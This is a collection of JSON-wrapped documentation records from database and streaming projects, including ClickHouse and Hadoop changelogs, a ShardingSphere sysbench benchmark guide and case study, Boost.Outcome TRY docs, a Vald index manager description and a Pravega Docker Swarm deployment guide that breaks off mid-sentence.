{ "category": "App Definition and Development", "file_name": "v21.4.4.30-stable.md", "project_name": "ClickHouse", "subcategory": "Database" }
[ { "data": "sidebar_position: 1 sidebar_label: 2022 Backported in : Now replicas that are processing the `ALTER TABLE ATTACH PART (). Backported in : Improved performance of `dictGetHierarchy`, `dictIsIn` functions. Added functions `dictGetChildren(dictionary, key)`, `dictGetDescendants(dictionary, key, level)`. Function `dictGetChildren` return all children as an array if indexes. It is a inverse transformation for `dictGetHierarchy`. Function `dictGetDescendants` return all descendants as if `dictGetChildren` was applied `level` times recursively. Zero `level` value is equivalent to infinity. Closes . (). Backported in : Added function `dictGetOrNull`. It works like `dictGet`, but return `Null` in case key was not found in dictionary. Closes . (). Backported in : Add aliases `simpleJSONExtract/simpleJSONHas` to `visitParam/visitParamExtract{UInt, Int, Bool, Float, Raw, String}`. Fixes . (). Backported in : Set `backgroundfetchespool_size` to 8 that is better for production usage with frequent small insertions or slow ZooKeeper cluster. (). Backported in : Raised the threshold on max number of matches in result of the function `extractAllGroupsHorizontal`. (). Backported in : Fixed a bug with unlimited wait for auxiliary AWS requests. (). Backported in : fixed `formatDateTime()` on `DateTime64` and \"%C\" format specifier fixed `toDateTime64()` for large values and non-zero scale. ... (). Backported in : Fix error `Cannot find column in ActionsDAG result` which may happen if subquery uses `untuple`. Fixes . (). Backported in : Remove non-essential details from suggestions in clickhouse-client. This closes . (). Backported in : Fixed `Table .inner_id... doesn't exist` error when selecting from Materialized View after detaching it from Atomic database and attaching back. (). Backported in : Some values were formatted with alignment in center in table cells in `Markdown` format. Not anymore. (). Backported in : Enable the bundled openldap on ppc64le ... ()." } ]
{ "category": "App Definition and Development", "file_name": "sysbench-proxy-norules-test.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"SysBench ShardingSphere-Proxy Empty Rule Performance Test\" weight = 1 +++ Compare the performance of ShardingSphere-Proxy and MySQL Sysbench directly carries out stress testing on the performance of MySQL. Sysbench directly carries out stress testing on ShardingSphere-Proxy (directly connect MySQL). Based on the above two groups of experiments, we can figure out the loss of MySQL when using ShardingSphere-Proxy. Db-related configuration: it is recommended that the memory is larger than the amount of data to be tested, so that the data is stored in the memory hot block, and the rest can be adjusted. ShardingSphere-Proxy-related configuration: it is recommended to use a high-performance, multi-core CPU, and other configurations can be customized. Disable swap partitions on all servers involved in the stress testing. ```shell [mysqld] innodbbufferpoolsize=${MORETHANDATASIZE} innodb-log-file-size=3000000000 innodb-log-files-in-group=5 innodb-flush-log-at-trx-commit=0 innodb-change-buffer-max-size=40 back_log=900 innodbmaxdirtypagespct=75 innodbopenfiles=20480 innodbbufferpool_instances=8 innodbpagecleaners=8 innodbpurgethreads=2 innodbreadio_threads=8 innodbwriteio_threads=8 tableopencache=102400 log_timestamps=system threadcachesize=16384 transaction_isolation=READ-COMMITTED ``` Refer to ```shell -Xmx16g -Xms16g -Xmn8g # Adjust JVM parameters ``` ```yaml databaseName: sharding_db dataSources: ds_0: url: jdbc:mysql://*...:*/test?serverTimezone=UTC&useSSL=false # Parameters can be adjusted appropriately username: test password: connectionTimeoutMilliseconds: 30000 idleTimeoutMilliseconds: 60000 maxLifetimeMilliseconds: 1800000 maxPoolSize: 200 # The maximum ConnPool is set to ${the number of concurrencies in stress testing}, which is consistent with the number of concurrencies in stress testing to shield the impact of additional connections in the process of stress testing. minPoolSize: 200 # The minimum ConnPool is set to ${the number of concurrencies in stress testing}, which is consistent with the number of concurrencies in stress testing to shield the impact of connections initialization in the process of stress testing. rules: [] ``` ```shell sysbench oltpreadwrite --mysql-host=${DBIP} --mysql-port=${DBPORT} --mysql-user=${USER} --mysql-password=${PASSWD} --mysql-db=test --tables=10 --table-size=1000000 --report-interval=10 --time=100 --threads=200 cleanup sysbench oltpreadwrite --mysql-host=${DBIP} --mysql-port=${DBPORT} --mysql-user=${USER} --mysql-password=${PASSWD} --mysql-db=test --tables=10 --table-size=1000000 --report-interval=10 --time=100 --threads=200 prepare ``` ```shell sysbench oltpreadwrite --mysql-host=${DB/PROXYIP} --mysql-port=${DB/PROXYPORT} --mysql-user=${USER} --mysql-password=${PASSWD} --mysql-db=test --tables=10 --table-size=1000000 --report-interval=10 --time=100 --threads=200 run ``` ```shell sysbench 1.0.20 (using bundled LuaJIT 2.1.0-beta2) Running the test with following options: Number of threads: 200 Report intermediate results every 10 second(s) Initializing random number generator from current time Initializing worker threads... Threads started! [ 10s ] thds: 200 tps: 11161.70 qps: 223453.06 (r/w/o: 156451.76/44658.51/22342.80) lat (ms,95%): 27.17 err/s: 0.00 reconn/s: 0.00 ... [ 120s ] thds: 200 tps: 11731.00 qps: 234638.36 (r/w/o: 164251.67/46924.69/23462.00) lat (ms,95%): 24.38 err/s: 0.00 reconn/s: 0.00 SQL statistics: queries performed: read: 19560590 # number of reads write: 5588740 # number of writes other: 27943700 # number of other operations (COMMIT etc.) total: 27943700 # the total number transactions: 1397185 (11638.59 per sec.) # number of transactions (per second) queries: 27943700 (232771.76 per sec.) # number of statements executed (per second) ignored errors: 0 (0.00 per sec.) # number of ignored errors (per second) reconnects: 0 (0.00 per sec.) # number of reconnections (per second) General statistics: total time: 120.0463s # total time total number of events: 1397185 # toal number of transactions Latency (ms): min: 5.37 # minimum latency avg: 17.13 # average latency max: 109.75 # maximum latency 95th percentile: 24.83 # average response time of over 95th percentile. sum: 23999546.19 Threads fairness: events (avg/stddev): 6985.9250/34.74 # On average, 6985.9250 events were completed per thread, and the standard deviation is 34.74 execution time (avg/stddev): 119.9977/0.01 # The average time of each thread is 119.9977 seconds, and the standard deviation is 0.01 ``` CPU utilization ratio of the server where ShardingSphere-Proxy resides. It is better to make full use of CPU. I/O of the server disk where the DB resides. The lower the physical read value is, the better. Network IO of the server involved in the stress testing." } ]
{ "category": "App Definition and Development", "file_name": "foreign-try.md", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "+++ title = \"Extending `BOOSTOUTCOMETRY`\" description = \"How to informing `BOOSTOUTCOMETRY` about foreign Result types.\" tags = [ \"TRY\" ] +++ Outcome's {{% api \"BOOSTOUTCOMETRY(var, expr)\" %}} operation is fully extensible to accept as input any foreign types. It already recognises types matching the {{% api \"concepts::valueorerror<T, E>\" %}} concept, which is to say all types which have: A public `.has_value()` member function which returns a `bool`. In order of preference, a public `.assume_value()`/`.value()` member function. In order of preference, a public `.asfailure()`/`.assumeerror()`/`.error()` member function. This should automatically handle inputs of `std::expected<T, E>`, and many others, including intermixing Boost.Outcome and standalone Outcome within the same translation unit. `BOOSTOUTCOMETRY` has the following free function customisation points: <dl> <dt><code>BOOSTOUTCOMEV2NAMESPACE::</code>{{% api \"tryoperationhasvalue(X)\" %}} <dd>Returns a `bool` which is true if the input to TRY has a value. <dt><code>BOOSTOUTCOMEV2NAMESPACE::</code>{{% api \"tryoperationreturnas(X)\" %}} <dd>Returns a suitable {{% api \"failure_type<EC, EP = void>\" %}} which is returned immediately to cause stack unwind. Ought to preserve rvalue semantics (i.e. if passed an rvalue, move the error state into the failure type). <dt><code>BOOSTOUTCOMEV2NAMESPACE::</code>{{% api \"tryoperationextractvalue(X)\" %}} <dd>Extracts a value type from the input for the `TRY` to set its variable. Ought to preserve rvalue semantics (i.e. if passed an rvalue, move the value). </dl> New overloads of these to support additional input types must be injected into the `BOOSTOUTCOMEV2_NAMESPACE` namespace before the compiler parses the relevant `BOOSTOUTCOMETRY` in order to be found. This is called 'early binding' in the two phase name lookup model in C++. This was chosen over 'late binding', where an `BOOSTOUTCOMETRY` in a templated piece of code could look up overloads introduced after parsing the template containing the `BOOSTOUTCOMETRY`, because it has much lower impact on build times, as binding is done once at the point of parse, instead of on every occasion at the point of instantiation. If you are careful to ensure that you inject the overloads which you need early in the parse of the translation unit, all will be well. Let us work through an applied example. This is a paraphrase of a poorly written pseudo-Expected type which I once encountered in the production codebase of a large multinational. Lots of the code was already using it, and it was weird enough that it couldn't be swapped out for something better easily. {{% snippet \"foreigntry.cpp\" \"foreigntype\" %}} What we would like is for new code to be written using Outcome, but be able to transparently call old code, like this: {{% snippet \"foreign_try.cpp\" \"functions\" %}} Telling Outcome about this weird foreign Expected is straightforward: {{% snippet \"foreigntry.cpp\" \"telloutcome\" %}} And now `BOOSTOUTCOMETRY` works exactly as expected: {{% snippet \"foreign_try.cpp\" \"example\" %}} ... which outputs: ``` new_code(5) returns successful 5 new_code(0) returns failure argument out of domain ```" } ]
{ "category": "App Definition and Development", "file_name": "CHANGELOG.0.15.0.md", "project_name": "Apache Hadoop", "subcategory": "Database" }
[ { "data": "<! --> | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Make ...hbase.io.MapWritable more generic so that it can be included in ...hadoop.io | Minor | io | Jim Kellerman | Jim Kellerman | | | Want to kill a particular task or attempt | Major | . | Owen O'Malley | Enis Soztutar | | | SleepJob | Major | . | Enis Soztutar | Enis Soztutar | | | Add link to irc channel #hadoop | Major | . | Enis Soztutar | Enis Soztutar | | | Add fancy graphs for mapred task statuses | Major | . | Enis Soztutar | Enis Soztutar | | | HDFS should have a NamenodeProtocol to allow secondary namenodes and rebalancing processes to communicate with a primary namenode | Major | . | Hairong Kuang | Hairong Kuang | | | Map output compression codec cannot be set independently of job output compression codec | Major | . | Riccardo Boscolo | Arun C Murthy | | | Code contribution of Kosmos Filesystem implementation of Hadoop Filesystem interface | Major | fs | Sriram Rao | Sriram Rao | | | Allow SOCKS proxy configuration to remotely access the DFS and submit Jobs | Minor | ipc | Christophe Taton | Christophe Taton | | | DFS shell should return a list of nodes for a file saying that where the blocks for these files are located. | Minor | . | Mahadev konar | Mahadev konar | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | organize CHANGES.txt messages into sections for future releases | Major | documentation | Doug Cutting | Doug Cutting | | | Add metrics for failed tasks | Major | . | Devaraj Das | Devaraj Das | | | Make FileStatus a concrete class | Major | fs | Chris Douglas | Chris Douglas | | | Add an option to setReplication method to wait for completion of replication | Major | . | Christian Kunz | Tsz Wo Nicholas Sze | | | Remove LOG members from PendingReplicationBlocks and ReplicationTargetChooser. | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | Add generics to Mapper and Reducer interfaces | Major | . | Owen O'Malley | Tom White | | | Redesign Tool and ToolBase API and releted functionality | Major | util | Enis Soztutar | Enis Soztutar | | | Small cleanup of DistributedFileSystem and DFSClient | Trivial | . | Christophe Taton | Christophe Taton | | | INode refactoring | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | contrib jar file names should include hadoop version number | Major | . | Doug Cutting | Doug Cutting | | | Add toString() methods to some Writable types | Major | io | Andrzej Bialecki | Andrzej Bialecki | | | Small cleanup of DistributedFileSystem and DFSClient (next) | Trivial |" }, { "data": "| Christophe Taton | Christophe Taton | | | IOUtils class | Major | io | Enis Soztutar | Enis Soztutar | | | File name should be represented by a byte array instead of a String | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | Merging Block and BlockInfo classes on name-node. | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | JobTracker should collect statistics of failed map output fetches, and take decisions to reexecute map tasks and/or restart the (possibly faulty) Jetty server on the TaskTracker | Major | . | Devaraj Das | Arun C Murthy | | | Typo issue in the job details JSP page | Trivial | . | Thomas Friol | Thomas Friol | | | JobClient CLI cleanup and improvement | Minor | . | Christophe Taton | Christophe Taton | | | We should log better if something goes wrong with the process fork | Major | . | Owen O'Malley | Owen O'Malley | | | Generalize making contrib bin content executable in ant package target | Minor | build | stack | stack | | | Small INodeDirectory enhancement to get all existing INodes components on a path | Trivial | . | Christophe Taton | Christophe Taton | | | Rework the various programs in 'examples' to extend ToolBase | Minor | . | Arun C Murthy | Enis Soztutar | | | Name-node memory size estimates and optimization proposal. | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | Remove DatanodeDescriptor dependency from NetworkTopology | Major | . | Konstantin Shvachko | Hairong Kuang | | | Divide the server and client configurations | Major | conf | Owen O'Malley | Arun C Murthy | | | Test coverage target in build files using clover | Major | build | Nigel Daley | Nigel Daley | | | Remove use of INode.parent in Block CRC upgrade | Major | . | Raghu Angadi | Raghu Angadi | | | Print the diagnostic error messages for FAILED task-attempts to the user console via TaskCompletionEvents | Major | . | Arun C Murthy | Amar Kamat | | | Change priority feature in the job details JSP page misses spaces between each priority link | Trivial | . | Thomas Friol | Thomas Friol | | | Namenode does not need to store storageID and datanodeID persistently | Major | . | Raghu Angadi | Raghu Angadi | | | typo's in dfs webui | Trivial | . | Nigel Daley | Nigel Daley | | | Save the configuration of completed/failed jobs and make them available via the web-ui. | Major | . | Arun C Murthy | Amar Kamat | | | Restructure data node code so that block sending/receiving is seperated from data transfer header handling | Major | . | Hairong Kuang | Hairong Kuang | | | Consider include/exclude files while listing datanodes. | Major | . | Raghu Angadi | Raghu Angadi | | | Design/implement a set of compression benchmarks for the map-reduce framework | Major |" }, { "data": "| Arun C Murthy | Arun C Murthy | | | DFSAdmin. Help messages are missing for -finalizeUpgrade and -metasave. | Blocker | . | Konstantin Shvachko | Lohit Vijayarenu | | | Wildcard input syntax (glob) should support {} | Major | fs | eric baldeschwieler | Hairong Kuang | | | JobConf should warn about the existance of obsolete mapred-default.xml. | Major | conf | Owen O'Malley | Arun C Murthy | | | Constructing a JobConf without a class leads to a very misleading error message. | Minor | . | Ted Dunning | Enis Soztutar | | | Increase the concurrency of transaction logging to edits log | Blocker | . | dhruba borthakur | dhruba borthakur | | | Documentation: improve mapred javadocs | Blocker | documentation | Arun C Murthy | Arun C Murthy | | | Update documentation for hadoop's configuration post HADOOP-785 | Major | documentation | Arun C Murthy | Arun C Murthy | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | constant should be user-configurable: MAX\\COMPLETE\\USER\\JOBS\\IN\\_MEMORY | Major | . | Michael Bieniosek | Michael Bieniosek | | | dfs.datanode.du.reserved semantics being violated | Blocker | . | Hairong Kuang | Hairong Kuang | | | DFS Client should create file when the user creates the file | Major | . | Owen O'Malley | Tsz Wo Nicholas Sze | | | DFSScalability: reduce memory usage of namenode | Major | . | dhruba borthakur | dhruba borthakur | | | Some improvements in progress reporting | Major | . | Devaraj Das | Devaraj Das | | | File locking interface and implementation should be remvoed. | Minor | fs | Raghu Angadi | Raghu Angadi | | | DfsTask cache interferes with operation | Minor | util | Chris Douglas | Chris Douglas | | | .sh scripts do not work on Solaris | Minor | scripts | David Biesack | Doug Cutting | | | Hadoop does not run in Cygwin in Windows | Critical | scripts | Tsz Wo Nicholas Sze | Tsz Wo Nicholas Sze | | | TestDFSUpgrade some times fails with an assert | Major | . | Raghu Angadi | Enis Soztutar | | | GenericWritable should use ReflectionUtils.newInstance to avoid problems with classloaders | Major | io | Owen O'Malley | Enis Soztutar | | | Task Trackers fail to launch tasks when they have relative log directories configured | Major | . | Owen O'Malley | Owen O'Malley | | | MapWritable and SortedMapWritable - Writable problems | Major | io | Jim Kellerman | Jim Kellerman | | | HDFS does not record the blocksize for a file | Major | . | Sameer Paranjpye | dhruba borthakur | | | ConnectException in TaskTracker Child | Major | . | Srikanth Kakani | Doug Cutting | | | Task.moveTaskOutputs is escaping special characters in output filenames | Critical |" }, { "data": "| Frdric Bertin | Frdric Bertin | | | TestIPC and TestRPC should use dynamically allocated ports | Major | ipc | Doug Cutting | Doug Cutting | | | Incorrect Value type in MRBench (SmallJobs) | Blocker | . | Devaraj Das | Devaraj Das | | | listTables() returns duplicate tables | Major | . | Andrew Hitchcock | Jim Kellerman | | | DfsTask no longer compiles | Major | build | Chris Douglas | Chris Douglas | | | processing escapes in a jute record is quadratic | Blocker | record | Dick King | Vivek Ratan | | | distcp should use the Path -\\> FileSystem interface like the rest of Hadoop | Major | util | Owen O'Malley | Chris Douglas | | | MultiFileSplit does not write and read the total length | Major | . | Thomas Friol | Thomas Friol | | | Files created with an pre-0.15 gets blocksize as zero, causing performance degradation | Blocker | . | dhruba borthakur | dhruba borthakur | | | Single lost heartbeat leads to a \"Lost task tracker\" | Major | . | Andrzej Bialecki | Arun C Murthy | | | MutliFileInputFormat returns \"empty\" MultiFileSplit when number of paths \\< number of splits | Major | . | Thomas Friol | Thomas Friol | | | Task's diagnostic messages are lost sometimes | Critical | . | Arun C Murthy | Arun C Murthy | | | DatanodeReport should distinguish live datanodes from dead datanodes | Major | . | Hairong Kuang | Hairong Kuang | | | Race condition in MiniDFSCluster shutdown | Major | test | Chris Douglas | Chris Douglas | | | make files visible in the namespace as soon as they are created | Major | . | dhruba borthakur | dhruba borthakur | | | The JobTracker should ensure that it is running on the right host. | Major | . | Owen O'Malley | Owen O'Malley | | | Revert a debug patch. | Trivial | . | Raghu Angadi | Raghu Angadi | | | Fix path in EC2 scripts for building your own AMI | Major | contrib/cloud | Tom White | Tom White | | | In the Job UI, some links don't work | Major | . | Devaraj Das | Amar Kamat | | | Reading an ArrayWriter does not work because valueClass does not get initialized | Major | io | Dick King | Cameron Pope | | | JobClient.runJob kills the job for failed tasks with no diagnostics | Major | . | Christian Kunz | Christian Kunz | | | ArrayIndexOutOfBoundException in BlocksMap | Blocker | . | Konstantin Shvachko | Konstantin Shvachko | | | ArrayIndexOutOfBoundsException with trunk | Major | . | Raghu Angadi | dhruba borthakur | | | files are not visible until they are closed | Critical | . | Yoram Arnon | dhruba borthakur | | | Remove extra '\\*'s from FsShell.limitDecimal() | Minor | . | Raghu Angadi | Raghu Angadi | | | Support for 0 reducers in PIPES | Major |" }, { "data": "| Christian Kunz | Owen O'Malley | | | keyToPath in Jets3tFileSystemStore needs to return absolute path | Major | fs/s3 | Ahad Rana | Tom White | | | Hadoop Pipes doesn't compile on solaris | Major | . | Owen O'Malley | Owen O'Malley | | | Periodic checkpointing cannot resume if the secondary name-node fails. | Major | . | Konstantin Shvachko | dhruba borthakur | | | Test dfs.TestFileCreation.testFileCreation failed on Windows | Blocker | test | Mukund Madhugiri | dhruba borthakur | | | TestDFSUpgradeFromImage doesn't shut down its MiniDFSCluster | Major | test | Chris Douglas | Chris Douglas | | | Too many fetch-failures issue | Blocker | . | Christian Kunz | Arun C Murthy | | | Extra checks in DFS.create() are not necessary. | Minor | . | Raghu Angadi | Raghu Angadi | | | about.html page is there but not linked. | Major | . | Enis Soztutar | Enis Soztutar | | | the job tracker should wait beteween calls to try and delete the system directory | Blocker | . | Owen O'Malley | Owen O'Malley | | | NullPointerException in internalReleaseCreate | Blocker | . | Konstantin Shvachko | dhruba borthakur | | | du should be not called on every heartbeat | Blocker | . | Konstantin Shvachko | Hairong Kuang | | | Spurious error message during block crc upgrade. | Blocker | . | Raghu Angadi | Raghu Angadi | | | the os.name string on Mac OS contains spaces, which causes the c++ compilation to fail | Major | . | Owen O'Malley | Owen O'Malley | | | Use of File.separator in StatusHttpServer prevents running Junit tests inside eclipse on Windows | Minor | . | Jim Kellerman | Jim Kellerman | | | Name-node should remove edits.new during startup rather than renaming it to edits. | Blocker | . | Konstantin Shvachko | Konstantin Shvachko | | | Secondary Namenode halt when SocketTimeoutException at startup | Blocker | . | Koji Noguchi | dhruba borthakur | | | Corrupted block replication retries for ever | Blocker | . | Koji Noguchi | Raghu Angadi | | | -get, -copyToLocal fail when single filename is passed | Blocker | . | Koji Noguchi | Raghu Angadi | | | TestCheckpoint fails on Windows | Blocker | . | Konstantin Shvachko | Konstantin Shvachko | | | jobs using pipes interface with tasks not using java output format have a good chance of not updating progress and timing out | Major | . | Christian Kunz | Owen O'Malley | | | multiple dfs.client.buffer.dir directories are not treated as alternatives | Blocker | fs | Christian Kunz | Hairong Kuang | | | Sort validation is taking considerably longer than before | Blocker | . | Mukund Madhugiri | Arun C Murthy | | | lost task trackers -- jobs hang | Blocker | . | Christian Kunz | Devaraj Das | | | Maps which ran on trackers declared 'lost' are being marked as FAILED rather than KILLED | Blocker |" }, { "data": "| Arun C Murthy | Devaraj Das | | | Namenode prints out too many log lines for \"Number of transactions\" | Blocker | . | dhruba borthakur | dhruba borthakur | | | Task times are not saved correctly (bug in hadoop-1874) | Blocker | . | Devaraj Das | Amar Kamat | | | Lost tasktracker not handled properly leading to tips wrongly being kept as completed, and hence not rescheduled | Blocker | . | Devaraj Das | Devaraj Das | | | Broken pipe SocketException in DataNode$DataXceiver | Blocker | . | Konstantin Shvachko | Hairong Kuang | | | TestLocalDirAllocator fails on Windows | Blocker | fs | Mukund Madhugiri | Hairong Kuang | | | Race condition in removing a KILLED task from tasktracker | Blocker | . | Devaraj Das | Arun C Murthy | | | streaming hang when IOException in MROutputThread. (NPE) | Blocker | . | Koji Noguchi | Lohit Vijayarenu | | | distcp fails if log dir not specified and destination not present | Blocker | util | Chris Douglas | Chris Douglas | | | Increase the buffer size of pipes from 1k to 128k | Blocker | . | Owen O'Malley | Amareshwari Sriramadasu | | | JobTracker's TaskCommitQueue is vulnerable to non-IOExceptions | Blocker | . | Arun C Murthy | Arun C Murthy | | | NPE at JobTracker startup.. | Blocker | . | Gautam Kowshik | Amareshwari Sriramadasu | | | Namenode encounters ClassCastException exceptions for INodeFileUnderConstruction | Blocker | . | dhruba borthakur | dhruba borthakur | | | In SequenceFile sync doesn't work unless the file is compressed (block or record) | Blocker | . | Owen O'Malley | Owen O'Malley | | | RawLocalFileStatus is causing Path problems | Major | fs | Dennis Kubes | | | | Test org.apache.hadoop.mapred.pipes.TestPipes.unknown failed | Blocker | . | Mukund Madhugiri | Owen O'Malley | | | ChecksumFileSystem checksum file size incorrect. | Blocker | fs | Richard Lee | Owen O'Malley | | | DISTCP mapper should report progress more often | Blocker | . | Runping Qi | Chris Douglas | | | Datanode corruption if machine dies while writing VERSION file | Blocker | . | Michael Bieniosek | Konstantin Shvachko | | | hadoop-daemon.sh script fails if HADOOP\\PID\\DIR doesn't exist | Minor | scripts | Michael Bieniosek | Michael Bieniosek | | | HADOOP-2046 caused some javadoc anomalies | Major | documentation | Nigel Daley | Nigel Daley | | | ToolBase doesn't keep configuration | Blocker | util | Dennis Kubes | Dennis Kubes | | | hdfs -cp /a/b/c /x/y acts like hdfs -cp /a/b/c/\\* /x/y | Minor | . | arkady borkovsky | Mahadev konar | | | \"Go to parent directory\" does not work on windows. | Minor | . | Konstantin Shvachko | Mahadev konar | | | df command doesn't exist under windows | Major | fs | Benjamin Francisoud | Mahadev konar | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Warnings With JDK1.6.0\\_02 | Minor | . | Nilay Vaish | Nilay Vaish |" } ]
{ "category": "App Definition and Development", "file_name": "index-manager.md", "project_name": "Vald", "subcategory": "Database" }
[ { "data": "Vald Index Manager is the component that controls the indexing process of Vald Agent Pods in the same Vald cluster. Vald Index Manager has a unique and simple role in controlling the indexing timing for all Vald Agent pods in the Vald cluster. It requires `Vald Discoverer` to fulfill its responsibility. This chapter shows the main features to fulfill Vald Index Managers role. Vald Index Manager gets the IP addresses of each Vald Agent pod from Vald Discoverer when its container starts. In addition, when IP address changes, Vald Index Manager gets the new IP address from Vald Discoverer. Vald Index Manager uses these for the controlling indexing process. When Vald Agent Pod creates or saves indexes on its container memory, it blocks all searching requests from the user and returns an error instead of a search result. Stop-the-world happens when all Vald Agent pods run the function involved in the indexing operation, e.g., `createIndex`, simultaneously. Vald Index Manager manages the indexing process of all Vald Agent pods to prevent this event. Vald Index Manager uses a Vald Agent pods' IP address list from Vald Discoverer and index information, including the stored index count, uncommitted index count, creating index count, and saving index count, from each Vald Agent pod. The control process is Vald Index Manager sends `createIndex` requests for concurrency simultaneously, sends a new request when the job is finished and continues until it sends to all agents. At the end of each process, Vald Index Manager updates the index information from each Vald Agent pod. Vald Index Manager runs this process periodically by set time intervals. <div class=\"notice\"> Concurrency means the number of Vald Agent pods for simultaneously sending requests for the indexing operation.<BR> When the Vald Agent pod has no uncommitted index or is running the indexing function already, it does not send the request. </div>" } ]
{ "category": "App Definition and Development", "file_name": "2022_04_29_Apache_ShardingSphere_Enterprise_Applications_Zhuanzhuan’s_Transaction_System_with_100s_of_Millions_of_Records.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"Apache ShardingSphere Enterprise Applications: Zhuanzhuans Transaction System with 100s of Millions of Records\" weight = 53 chapter = true +++ is an internet platform that allows it users to sell their second-hand stuff sort of an eBay of the East. Its business had been booming, and with it the ordering system started to face increasing performances challenges. The order database is the cornerstone of the system, and its performance should not be underestimated. Challenges: During promotions and special discount periods the burden on databases is heaby with tens of thousands of single database queries per second (qps) taking up huge database resources, and causing a significant reduction in write performance. Increased data pressure, with a single database containing several large tables with hundreds of millions of data, which challenges the capacity limit of the server. Overwhelming data volume, and data backup and recovery take a long time, posing high risks of data loss in extreme cases. In the beginning, ZhuanZhuans team took adjustment measures to ease the database pressure. Exmaples include: Optimized major transactions, reduced transactions, and even eliminated transactions We adjusted the original transaction order by putting table generation, the core step at the end, and keeping the transaction only in the order primary database. When the operation of the main table was abnormal, dirty reads were allowed on other order-related tables. Order data cache Data consistency was the trickiest part of the cache. As order data involved account settlements and commission, non-real-time and inconsistent data would cause serious accidents. Strictly keeping cache data consistency would complex coding and reduce system concurrency. Therefore, we made some compromises on cache plans: Allowing direct query when cache failed. Adding version serial number, and querying the latest versions data to ensure real-time data. Complex queries were conducted by and primary and secondary separation, and for some large tables, we adopted hot and cold data separation. Through these optimizations, database pressure was eased. However, it still seemed overwhelming under high concurrency scenarios, such as discount season. To fundamentally solve the performance problem of order database, ZhuanZhuan decided to adopt data sharding (database and table splitting) on the `order` database so that we wouldnt have to worry about order capacity in the future 35 years. Zhuangzhuang chose after comparing the efficiency, stability, learning cost and etc. of different data sharding components. Advantages of ShardingSphere: It provides standardized data sharding, distributed transactions and database governance, and its applicable in a variety of situations such as Java isomorphism, heterogeneous language and cloud native. It has flexible sharding strategies, supporting multiple sharding methods. Its easy to integrate with other components and has a low level of transaction intrusions. It has extensive documentation and an active community. ShardingSphere initiated the Database Plus concept and adopts a plugin oriented architecture where all modules are independent of each other, allowing each to be used individually or flexibly" }, { "data": "It consists of three products, namely , and (Planning), which supports both independent and hybrid deployment. Below is a feature comparison of the three products: By comparison, and considering the high order concurrency, we chose ShardingSphere-JDBC as our data sharding middleware. ShardingSphere-JDBC is a lightweight Java framework, proving extra service at the JDBC layer. It directly connects to the database by the client-side, provides services by Jar package, and requires no extra deployment and reliance. It can be seen as an enhanced JDBC driver, fully compatible with JDBC and other Object-Relational Mapping(ORM) frameworks. Sharding Key The current order ID is generated by `timestamp+user identification code+machine code+incremental sequence`. The user identification code is taken from bits 9 to 16 of the buyer ID, a true random number when the user ID is generated, and is thus suitable as a sharding key. Choosing user identification code as the sharding key has some advantages: The data can be distributed as evenly as possible to each database and table. Specific sharding locations can be quickly located either by order ID or user ID. Data of the same buyer can be distributed to the same databases and tables, facilitating the integrated query of the buyer information. The sharding strategy: we adopt 16 databases and 16 tables. User identification codes are used to split databases, and higher 4 bits are used to split tables. Data Migration between Old and New Databases The migration must be online, and downtime migration cannot be accepted, as there will be new data writes during the migration process. The data should be intact, and the migration process should be insensible to the client-side. After the migration, data in the new database should be consistent with the ones in the old databases. The migration should allow rollback, so that when a problem occurs during the migration process, it should be able to roll back to the source database without impacting system availability. Data migration steps are as follows: dual writes-> migrate historical data-> verify-> old database offline. It solves the problem of single database capacity limit. The data volume of a single database and table is greatly reduced after sharding. The data volume of a single table is reduced from nearly a hundred million level to several millions level, which greatly improves the overall performance. It reduces the risk of data losses due to oversized single databases and tables in extreme cases and eases the pressure of operation and maintenance. The following is a comparison of the number of interface calls of the order placement service and the time consumed by the interface during two promotion and discount periods: Promotion before adopting ShardingSphere Promotion after adopting ShardingSphere ShardingSphere simplifies the development of data sharding with its well-designed architecture, highly flexible, pluggable and scalable capabilities, allowing R&D teams to focus only on the business itself, thus enabling flexible scaling of the data architecture. Apache ShardingSphere Project Links:" } ]
{ "category": "App Definition and Development", "file_name": "docker-swarm.md", "project_name": "Pravega", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Copyright Pravega Authors. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Docker Swarm can be used to quickly spin up a distributed Pravega cluster that can easily scale up and down. Unlike `docker-compose`, this is useful for more than just testing and development. In future, Docker Swarm will be suitable for production workloads. A working single or multi-node Docker Swarm. Please refer to . HDFS and ZooKeeper. We provide compose files for both of these, but both are single instance deploys that should only be used for testing/development. More information to deploy our HDFS and ZooKeeper can be found . Please refer to `hdfs.yml` and `zookeeper.yml` files. ``` docker stack up --compose-file hdfs.yml pravega docker stack up --compose-file zookeeper.yml pravega ``` This runs a single node HDFS container and single node ZooKeeper inside the `pravega_default` overlay network, and adds them to the `pravega` stack. HDFS is reachable inside the swarm as ``` hdfs://hdfs:8020 ``` ZooKeeper is reachable at ``` tcp://zookeeper:2181. ``` Either one or both of these can be initiated for running, but serious workloads cannot be handled. Each Pravega Segment Store needs to be directly reachable by clients. Docker Swarm runs all traffic coming into its overlay network through a load balancer, which makes it more or less impossible to reach a specific instance of a scaled service from outside the cluster. This means that Pravega clients must either run inside the swarm, or we must run each Segment Store as a unique service on a distinct port. Both approaches are demonstrated in the below" }, { "data": "The easiest way to deploy is to keep all traffic inside the swarm. This means your client apps must also run inside the swarm. ``` ZKURL=zookeeper:2181 HDFSURL=hdfs:8020 docker stack up --compose-file pravega.yml pravega ``` Note that `ZKURL` and `HDFSURL` don't include the protocol. They have default values assigned as `zookeeper:2181` and `hdfs:8020`, when 